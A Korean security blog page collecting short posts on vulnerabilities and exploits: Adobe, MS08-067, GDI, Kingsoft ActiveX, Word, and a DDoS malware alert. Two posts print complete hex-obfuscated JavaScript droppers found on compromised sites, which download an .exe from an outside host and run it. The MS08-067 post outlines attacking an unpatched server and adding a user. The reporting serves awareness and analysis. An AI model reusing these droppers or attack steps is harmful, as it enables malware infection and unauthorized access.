아크로뱃의 제작사인 어도비(Adobe)는 자사 블로그에 보안에 관련된 사항을 간단히 게시하였습니다. 내용을 요약하자면

어도비 社는 아크로뱃 리더, 아크로뱃 9.1.2(최신 버전임), 플래시 플레이어 9, 10 버전에서 잠재적인 취약점에 대한 사항을 확인 중에 있으며, 수집된 정보를 이용하여 업데이트를 제공할 예정입니다.

원문: http://blogs.adobe.com/psirt/2009/07/potential_adobe_reader_and_fla.html

외국의 보안 사이트에 따르면, PDF 문서에 임베드된 플래시에서 취약점이 있는 것으로 알려 지고 있으며, 지난 수요일에 트위터(단문 기반의 서비스)의 트윗(게시 글)에 제로데이 웜이 출현한 것으로 알려지고 있습니다.

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    취약점이 발견되고 난 뒤 곧바로 이 취약점을 이용하는 공격코드가 출현하는 경우가 늘고 있습니다. 최근의 IE 버그를 볼 때 이러한 취약점은 개발사가 패치하기 전까지는 해결방법의 거의 전무한 상태입니다.

     안티바이러스 전문 기업인 F-SECURE에서는 이러한 제로데이 공격을 차단할 수 있는 익스플로잇 쉴드(Exploit Shield)를 출시하였습니다. 현재 베타버전으로 빌드는 0.5.2088 입니다.

     익스플로잇 쉴드는 웹 기반의 익스플로잇 공격과 이 공격으로 인해 감염되는 악성 프로그램을 차단합니다. 또한, 진단한 악성 프로그램이나 악성 프로그램을 담고 있는 URL은 자동적으로 F-SECURE 보안팀으로 전송되어 새로운 익스플로잇 코드 등을 분석하는데 도움을 줄 수 있습니다.

     익스플로잇 쉴드는 윈도우 XP(SP0부터 SP3)에서만 동작합니다. 또한, 인터넷 익스플로러, 모질라 파이어폭스를 지원합니다.

     익스플로잇 쉴드의 특징을 살펴보면 다음과 같습니다.

    * 제로데이 보호: 소프트웨어 벤더로부터 패치 버전을 제공받지 않은 클라이언트 PC 보호

    * 패치에 근접한 보호: 한번 업데이트만으로 모든 익스플로잇을 예방

    * 사전 방어: 휴리스틱 분석 기술을 통해 알려지지 않은 새로운 취약점으로부터 익스플로잇을 예방

    * 악성 웹사이트와 해킹당한 일방 사이트로부터 보호

    * 악성 URL을 자동으로 F-SECURE로 전송

     프로그램은 아래 링크에서 다운로드받을 수 있으며, 설치 과정은 아주 평이합니다.

    http://support.f-secure.com/beta/downloads/F-Secure%20ExploitShield%200.5%20build%2088.exe

     프로그램을 실행하면 아래와 같이 간단한 구조를 볼 수 있습니다.

     사용자가 설정할 부분은 Exploit Shield - Vulnerability Shields 부분입니다. 대부분 취약점을 막아야 하므로 실제 사용자가 설정할 부분은 거의 없습니다.

     단, 네트워크 환경에서 프록시를 사용하는 경우에는 아래와 같이 Automatic Updates - Connection 탭에서 프록시 정보를 입력해야 합니다.

     단점은 한글판 윈도우에서는 오른쪽 부분이 약간 잘려서 보인다는 점입니다. 아래 화면에서 자동 업데이트를 Check 하는 부분이 잘려 보입니다.

     참고로, 메모리에서 차지하는 용량은 약 12MB 정도로 작습니다.

     감사합니다.

    reTweet
    Posted by 문스랩닷컴
    blog comments powered by Disqus

      이번 달의 화두는 바로 MS08-067입니다. 인터넷 상에 PoC 공개되었습니다. 현재 국내로 취약점을 이용하여 다양한 공격이 이루어지고 있으며 아래 자료를 통해 Server 서비스가 공격을 받는 상세한 자료를 보실 있습니다.

      http://www.ntfaq.co.kr/4286

      또한, 최근 중국에서 이러한 코드를 이용하여 원격지(패치가 안된) 접속하는 자료가 소개되었습니다.

      익스플로잇 코드의 이름은 MS0867.exe 파일이며 이는 인터넷 상에서 손쉽게 구할 있으므로 생략합니다.

      공격 방식은 도스창(cmd) 열고 입력합니다.

      C:\경로\MS08067.exe <공격 서버 IP>

      만약 패치가 되어 있는 경우에는 아래와 같이 나타납니다.

      공격에 성공할 경우 netstat -na 명령어로 확인하여 있습니다.

      이제 텔넷 명령어로 개방된 포트로 접속하면 프롬프트가 나타납니다.

      아래와 같이 사용자를 추가하고 로컬 사용자 그룹에서 보면 사용자가 추가된 모습을 있습니다.

       

      감사합니다.

      출처: http://bbs.cnhacknet.com/thread-3315-1-2.html

      reTweet
      Posted by 문스랩닷컴
      blog comments powered by Disqus
        안티 바이러스, 시큐리티 슈트와 같은 보안 제품은 우리가 컴퓨터를 보다 안전하게 사용할 수 있도록 도와주는 프로그램입니다. 하지만, 등잔 밑이 어둡고, 가까운 곳에 적이 숨어 있는 법.

        또한, 보안 제품을 타겟으로 하는 전문 악성 프로그램(익스플로잇)이 있다고 합니다. 이에 대해 간략히 정리해 봅니다.

        시큐니아(Secunia)는 윈도우 뿐만 아니라 다양한 애플리케이션에서 발생할 수 있는 취약점을 상세하게 알려 주는 스캐너 프로그램으로 유명합니다. 시큐니아는 컴퓨터를 보호하기 위해 사용하는 여러 보안 제품들이 익스플로잇으로부터 위협이 되고 있다는 보고서를 밝혔습니다. 이 보고서에서는 보안 제품을 공격하는 실제 익스플로잇이 얼마나 되는지도 밝혔습니다.

        시큐니아는 맥아피, 시만텍, F-Secure, 빗디펜더, 판다, 카스퍼스키 등 회사가 제공하는 보안 프로그램과 마이크로소프트가 제공하는 원케어 그리고 존알람 시큐리티 슈트 8, AVG 인터넷 시큐리티 8, CA 인터넷 시큐리티 2008, 트렌드 마이크로 인터넷 시큐리티 2008, 노만 7.10 등 제품을 테스트하였다.

        약 300 가지의 익스플로잇에 대한 테스트가 진행되었으며 이 중 126개는 시큐니아에서 매우 중요하게 여기는 익스플로잇이었습니다. 가장 중요한 테스트는 바로 제로데이 위협, 널리 알려져 있는 익스플로잇, 그리고 시큐니아에서 개발한 익스플로잇으로 구성되어 있습니다.

        테스트 결과 노턴 인터넷 시큐리티 2009가 다른 제품이 비해 대부분의 익스플로잇을 진단하고 차단하는데 효과적인 것으로 밝혀졌습니다. 하지만, 즐거워하기에는 너무 이릅니다. 노턴에서 진단해 낸 익스플로잇은 300 개 중에서 고작 64개로 21.33%에 불과합니다.

        빗디펜더와 트렌드 마이크로는 두번째로 높은 진단율을 보였으며 각각 2.33%와 3.97%에 불과했습니다. 맥아피는 겨우 2%를 차지했지만 세번째로 등급이 매겨졌습니다.

        그리고 원케어, 카스퍼스키, AVG, F-Secure, 판다, 존알람, CA, 노만의 순서로 진단율을 보이고 있으며 존알람은 0.67%, CA는 0.33%에 불과했습니다.


        출처: http://www.thetechherald.com/article.php/200842/2243/Security-suites-fail-exploit-testing-as-Secunia-proves-layers-work
        reTweet
        Posted by 문스랩닷컴
        blog comments powered by Disqus
          지난4월 2번째 주에는 마이크로소프트의 월간 정기 업데이트가 발표된 적이 있습니다. 이 가운데에는 거의 대부분이 치명적인(Critical) 취약점이었으며 그 중에서도 운영체제 커널에 가장 가깝게 운영되는 모듈인 GDI에 관련된 취약점이 발표되고 이에 대한 패치도 발표되었습니다.

          이 취약점은 실제 익스플로잇 코드가 나오지는 않았고 실험적(proof-of-concept)인 수준에 머물렀다고 발표했었습니다.

          하지만, 시만텍에서는 중국어판 Windows 2000 서비스팩 4(SP4)에서 동작하는 익스플로잇 코드가 milw0rm.com 사이트에 공개되어 알려져 있다고 발표했습니다. 이 코드는 앞에서 언급했었지만 윈도우 GDI(graphics device interface)의 치명적인 버그 2개 중 하나를 이용합니다.

          현재에는 중국어판 윈도우에서 동작하는 익스플로잇 코드가 나왔지만 오래지 않아 다른 언어, 운영체제에서 동작하는 익스플로잇이 나올 것이라는 것은 짐작하여 알 수 있습니다.

          영어로 된 운영체제에서는 외부에서 코드를 성공적으로 수행시키지는 못하지만, 윈도우 운영체제를 멈추게 할 수 있다고 합니다.

          아래는 익스플로잇 코드에 대한 해당 홈페이지의 자료입니다.

          /////////////////////////////////////////////////////////////
          ///Exploit the MS08-021 : Stack Overflow on GDI API
          ///Author: Lamhtz
          ///Date: April 14th, 2008
          ///Usage: <appname.exe> [filename]
          ///Function: Generate a crafted emf file which could
          /// automatically run calc.exe in Win2kSP4 CHS Version
          /// with MS07-046 patched but no MS08-021 is installed.
          /// In Windows XP SP2, explorer.exe will crashed but
          /// calc will not be run.
          /////////////////////////////////////////////////////////////




          http://www.milw0rm.com/sploits/2008-exploit_08021.zip // milw0rm.com [2008-04-14]


          reTweet
          Posted by 문스랩닷컴
          blog comments powered by Disqus
            국내에서는 그리 많이 알려져 있지 않은 킹소프트(Kingsoft)의 안티 바이러스 제품에서 보안 취약점이 발견되었습니다. 취약점은 온라인 검사에 사용되는 Active-X 컨트롤에서 나타나며 버퍼 오버플로 오류가 발생합니다.

            취약점은 외부에서 시스템에 액세스할 수 있는 매우 위험한 것으로 알려져 있습니다. 또한, 아직까지 패치가 제공되지 않아 사용에 주의해야 합니다.

            취약점이 발생한 제품은 Kingsoft Antivirus Online Update Module 2007.x입니다.

            취약점의 원인은 좀더 세부적으로 설명하면 다음과 같습니다.

            KUpdateObj2 클래스 Active-X 컨트롤(UpdateOcx2.dll)에서 SetUninstallname()함수의 인자를 전달하여 처리할 때에 경계 오류(boundary error)를 일으킵니다. 따라서, 아주 긴 인자를 전달하여 힙 기반의 버퍼 오버플로를 발생시켜 공격을 주도하게 됩니다. 이후에는 공격자가 의도한 코드를 실행함으로써 공격이 마무리되는 시나리오입니다.

            취약점은 UpdateOcx2.dll 파일의 2007.12.29.29 버전에서 확인되었으며 다른 버전에서도 취약점이 그대로 나타날 것으로 예상됩니다.

            더 큰 문제는 이 취약점을 이용한 익스플로잇 코드가 이미 인터넷 상에 공개되었습니다. 따라서, 가급적 이 제품의 사용을 중지하는 것이 좋습니다. 또는 킬빗(killbit)을 설정하여 해당 Active-X 컨트롤을 일시적으로 사용하지 않게 합니다.

            http://milw0rm.com/exploits/5225

            출처: http://secunia.com/advisories/29204/
            reTweet
            Posted by 문스랩닷컴
            blog comments powered by Disqus
              지난 주에는 마이크로소프트 10월 정기 보안 업데이트가 있었습니다. 이 중에 MS 워드에 관련된 취약점을 해결하는 업데이트도 포함되어 있었는데, 이 취약점에 관련된 익스플로잇이 실제로 발견되었다는 소식입니다.

              지금까지의 전례를 볼 때에는 취약점을 이용하여 바이러스, 웜 등의 악성 프로그램을 제작하여 유포하는 형태였습니다만, 워드에서는 프로그램을 실행하는 것이 아니라 실제 워드 문서의 일부분을 변형하였다고 합니다. 즉, 워드 문서에 쉘 코드와 악성 프로그램(트로이 목마)가 심어져 있다는 것입니다.

              워드 프로그램에서 이렇게 변형된 문서를 실행하면 프로그램이 제대로 수행되지 않고 종료된다고 합니다. 이러한 취약점은 워드 2007 버전을 제외한 다른 버전 그리고 다른 언어 버전에서도 동일하게 발생합니다.

              변형된 문서를 열어보면 아래 그림과 같이 일부 코드가 변경되어 있습니다. 이 부분은 워드 문서의 헤더에 위치한 것으로 OLE에 관련된 것으로 알려졌습니다.
              사용자 삽입 이미지

              시만텍은 이러한 문제를 발생시키는 문서를 Troyan.Mdropper.Z으로 진단하며, 이에 관련된 파일들도 진단한다고 합니다.

              참고로, 이 문제점은 지난 주에 발표한 보안 패치(MS07-60)를 통해 익스플로잇이 존재한다는 사실이 알려졌습니다.


              reTweet
              Posted by 문스랩닷컴
              blog comments powered by Disqus
                블러그를 하던 중에 Design Liv2님의 글을 보니, 오픈블로그(www.openblog.co.kr) 사이트가 해킹된 거 같다는 글을 보았습니다.

                즉시, 접속하여 확인해 보니, 탑 페이지에 iframe 명령어를 사용한 악성 코드가 삽입되어 있습니다.
                사용자 삽입 이미지

                해당 사이트에 접속하여 다시 소스를 보니, 익스플로잇이 실행되도록 조작되어 있습니다.
                <script language=javascript>
                try {
                eval("\x76\x61\x72\x20\x64\x66\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x6F\x62\x6A\x65\x63\x74\x27\x29\x3B");
                eval("\x64\x66\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x27\x63\x6C\x61\x73\x73\x69\x64\x27\x2C\x27\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x27\x29\x3B");
                eval("\x76\x61\x72\x20\x78\x50\x6F\x73\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x27\x2C\x27\x27\x29\x3B");
                eval("\x78\x50\x6F\x73\x74\x2E\x4F\x70\x65\x6E\x28\x27\x47\x45\x54\x27\x2C\x27\x68\x74\x74\x70\x3A\x2F\x2F\x36\x34\x2E\x33\x37\x2E\x37\x31\x2E\x39\x38\x2F\x76\x62\x73\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
                eval("\x78\x50\x6F\x73\x74\x2E\x53\x65\x6E\x64\x28\x29\x3B\x76\x61\x72\x20\x73\x47\x65\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D\x27\x2C\x27\x27\x29\x3B");
                eval("\x73\x47\x65\x74\x2E\x4D\x6F\x64\x65\x3D\x33\x3B\x73\x47\x65\x74\x2E\x54\x79\x70\x65\x3D\x31\x3B\x73\x47\x65\x74\x2E\x4F\x70\x65\x6E\x28\x29\x3B");
                eval("\x73\x47\x65\x74\x2E\x57\x72\x69\x74\x65\x28\x78\x50\x6F\x73\x74\x2E\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B");
                eval("\x73\x47\x65\x74\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x32\x29\x3B");
                eval("\x76\x61\x72\x20\x78\x20\x3D\x20\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x77\x73\x63\x72\x69\x70\x74\x2E\x73\x68\x65\x6C\x6C\x27\x2C\x27\x27\x29\x3B");
                eval("\x78\x2E\x72\x75\x6E\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
                eval("");
                }
                catch (error)
                { }
                </script>
                <script type="text/jscript">
                function init() {
                document.write("Not Found");
                }
                window.onload = init;
                </script>

                최근 유행하는 공격 패턴은 ARP 스푸핑을 이용하여 조작하여 공격하는 것으로 이 중 공격 패턴은 앞서 언급한 것과 같이 탑 페이지에 익스플로잇을 통해 다른 경유서버에서 다운로드하여 실행하게 하는 방식입니다.

                오픈블로그에서 빨리 조치를 취하시길... ...

                reTweet
                Posted by 문스랩닷컴
                blog comments powered by Disqus
                  혹시 파이어폭스로 인터넷 서핑하다가 help.js를 다운로드한다는 팝업창이 나온 적이 있나요?

                  오늘 여러 사이트를 방문하다가 하나를 찾아 내서 다운로드하여 보았는데,

                  정확한 코드는 분석을 해봐야겠지만,

                  그냥 느낌에는 '익스플로잇'으로 보입니다.

                  아래는 소스 코드 입니다.

                  졸려서 아직 사이트가 어디였는지를 '재현'하고 있지 못합니다. T.T..

                  일단 자고, 내일 찾아 봐야겠습니다.

                  document.writeln("<script language=javascript>");
                  document.writeln("try");
                  document.writeln("{");
                  document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x64\\x66\\x20\\x3D\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x63\\x72\\x65\\x61\\x74\\x65\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x28\\x27\\x6F\\x62\\x6A\\x65\\x63\\x74\\x27\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x64\\x66\\x2E\\x73\\x65\\x74\\x41\\x74\\x74\\x72\\x69\\x62\\x75\\x74\\x65\\x28\\x27\\x63\\x6C\\x61\\x73\\x73\\x69\\x64\\x27\\x2C\\x27\\x63\\x6C\\x73\\x69\\x64\\x3A\\x42\\x44\\x39\\x36\\x43\\x35\\x35\\x36\\x2D\\x36\\x35\\x41\\x33\\x2D\\x31\\x31\\x44\\x30\\x2D\\x39\\x38\\x33\\x41\\x2D\\x30\\x30\\x43\\x30\\x34\\x46\\x43\\x32\\x39\\x45\\x33\\x36\\x27\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x78\\x50\\x6F\\x73\\x74\\x3D\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x4D\\x69\\x63\\x72\\x6F\\x73\\x6F\\x66\\x74\\x2E\\x58\\x4D\\x4C\\x48\\x54\\x54\\x50\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x78\\x50\\x6F\\x73\\x74\\x2E\\x4F\\x70\\x65\\x6E\\x28\\x27\\x47\\x45\\x54\\x27\\x2C\\x27\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x77\\x77\\x77\\x2E\\x67\\x69\\x73\\x61\\x37\\x39\\x2E\\x63\\x6F\\x6D\\x2F\\x68\\x65\\x6C\\x70\\x2E\\x65\\x78\\x65\\x27\\x2C\\x30\\x29\\x3B\");");
                  document.writeln("");
                  document.writeln("    eval(\"\\x78\\x50\\x6F\\x73\\x74\\x2E\\x53\\x65\\x6E\\x64\\x28\\x29\\x3B\\x76\\x61\\x72\\x20\\x73\\x47\\x65\\x74\\x3D\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x41\\x44\\x4F\\x44\\x42\\x2E\\x53\\x74\\x72\\x65\\x61\\x6D\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x4D\\x6F\\x64\\x65\\x3D\\x33\\x3B\\x73\\x47\\x65\\x74\\x2E\\x54\\x79\\x70\\x65\\x3D\\x31\\x3B\\x73\\x47\\x65\\x74\\x2E\\x4F\\x70\\x65\\x6E\\x28\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x57\\x72\\x69\\x74\\x65\\x28\\x78\\x50\\x6F\\x73\\x74\\x2E\\x52\\x65\\x73\\x70\\x6F\\x6E\\x73\\x65\\x42\\x6F\\x64\\x79\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x73\\x47\\x65\\x74\\x2E\\x53\\x61\\x76\\x65\\x54\\x6F\\x46\\x69\\x6C\\x65\\x28\\x27\\x63\\x3A\\x2F\\x6E\\x74\\x6C\\x64\\x72\\x2E\\x65\\x78\\x65\\x27\\x2C\\x32\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x76\\x61\\x72\\x20\\x78\\x20\\x3D\\x20\\x64\\x66\\x2E\\x43\\x72\\x65\\x61\\x74\\x65\\x4F\\x62\\x6A\\x65\\x63\\x74\\x28\\x27\\x77\\x73\\x63\\x72\\x69\\x70\\x74\\x2E\\x73\\x68\\x65\\x6C\\x6C\\x27\\x2C\\x27\\x27\\x29\\x3B\");");
                  document.writeln("    eval(\"\\x78\\x2E\\x72\\x75\\x6E\\x28\\x27\\x63\\x3A\\x2F\\x6E\\x74\\x6C\\x64\\x72\\x2E\\x65\\x78\\x65\\x27\\x2C\\x30\\x29\\x3B\");");
                  document.writeln("    eval(\"\");");
                  document.writeln("    ");
                  document.writeln("}");
                  document.writeln("catch (error)");
                  document.writeln("{");
                  document.writeln("}");
                  document.writeln("<\/script>");
                  document.writeln("");
                  document.writeln("");
                  document.writeln("")

                  reTweet
                  Posted by 문스랩닷컴
                  blog comments powered by Disqus
                    지난 9월달에 발표된 보안 취약점 가운데 Agent에 관련되어 익스플로잇이 공개되었습니다. 이 익스플로잇을 사용하여 DDoS 공격을수행하는 악성코드가 출현하였으며, 이에 대한 경보를 국정원에서 발표했습니다.

                    개요
                    해외로부터 DDoS 공격 기능의 악성코드가 국내에 유입되어 네트워크 마비 등 피해가 발생하고 있음.

                    주요특징
                    • 악성코드 감염시 특정 도메인(www.e-gold.com)을 대상으로 SYN Flooding 공격을 수행
                    • 과도한 트래픽 발생으로 인해 네트워크 장애 발생

                    감염증상

                    • 악성코드 복사: %systemroot%\temp\VRT[임의숫자].tmp로 복사
                    • DDoS 공격: TCP 80/8080 포트

                    대응책

                    • 최신 백신을 통해 감염된 파일 치료 및 제거
                    • 감염된 PC를 네트워크에서 분리

                    참고사이트

                    PC의 윈도우 업데이트 확인하고, 백신으로 한번 검사하면 더이상 걱정할 필요는 없겠네요. ㅎㅎ
                    reTweet
                    Posted by 문스랩닷컴
                    blog comments powered by Disqus


                      Web Analytics Blogs Directory